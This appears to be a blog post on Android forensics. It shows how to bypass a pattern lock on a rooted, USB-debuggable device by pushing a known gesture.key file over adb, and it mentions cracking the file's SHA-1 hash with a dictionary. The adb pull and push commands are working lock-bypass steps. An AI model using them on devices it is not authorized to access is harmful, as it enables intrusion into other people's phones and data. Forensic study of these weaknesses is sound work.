Introduction
Android is an open source operating system based on the Linux kernel, initially developed by Android Inc., which Google bought in 2005. Initially, Android was developed to support touch screen devices like smartphones. These devices support different types of screen locks, like swipe lock, PIN lock, pattern lock, gesture lock, facial lock, etc.Swipe lock unlocks the screen just by swiping a defined area on the screen with your fingertips. PIN lock is when you enter a correct pin, the screen will be unlocked. Pattern lock unlocks the screen when the user creates a pattern by joining nine circles on the screen, which is already saved on your system. This article is only based on the pattern locking system and does not cover biometric locking systems available on the phones.
Understanding Android Pattern Locks
Figure 1: Android Pattern lock with numbering
Figure 2: Pattern for 1478
The Catch
The catch to change the pattern is replace this file with a known pattern gesture.key file.Prerequisite
- Debugging mode should be enabled.
- Android adb (Android Debugger Bridge) tool.
- AVD (Android Virtual Device) Manager Tool.
- Device USB Cable
- Device whose password needed to be changed
Methodology
Step 1Start an AVD (Android Virtual Device), and create a pattern in the AVD. Open a command prompt. Execute the following command to check whether the AVD has been connected to the debugger or not.
1. adb devicesThe output of the command should look as shown in Figure 3. If you see the name of your emulator on the screen, then your device is perfectly connected.
Figure 3: Output of adb devices
Now pull out the gesture.key file from the AVD. For this execute the command that is mentioned below. This file is located in /data/system.
1. adb pull /data/system/gesture.key gesture.keyThe gesture.key file will be pulled to your current working directory. Here the syntax of command is adb pull . Here my current working directory is my home folder. So the gesture.key file will be pulled out in my local file system in my home directory.
The output of the command is as shown n Figure 4.
Figure 4: Pulling out gesture.key file
Now connect the other device, whose password is to be changed and close the AVD. For my example I will be using the same AVD. So now my password in my AVD is 1478 according to the pattern cell numbers. Figure 5 illustrates the pattern.
Figure 5: Current pattern of the Device
Figure 6: The new pattern which is not stored in the AVD
Now to change the password with a known pattern, we will push our known pattern file to the new device. The command for pushing a file into an android system is shown below. This file has to be pushed into /data/system of the new device.
adb push gesture.key /data/system/gesture.keyThe gesture.key file will be pushed into the Android’s file system replacing the previous file. So now android will be having a new gesture file which contains a known password, and when we use this pattern to unlock the screen, the screen will be unlocked. The syntax for pushing a file into an Android system is adb push .
The output of the command is shown in Figure 7.
Figure 7: Pushing the known pattern file into the android system
Figure 8: Pattern replaced with a known pattern
Limitations
- The device should be rooted
- The device should have USB debugging mode enabled
Reference
You can also look for the SHA-1 Hash values of the gesture key and match it with the database to find out the pattern lock combination. For this you can use my python script (https://github.com/c0d3sh3lf/Android_Forensics) to automate the decoding process.You can download the dictionary file from http://www.android-forensics.com/tools/AndroidGestureSHA1.rar (25 MB)
0 comments :
Post a Comment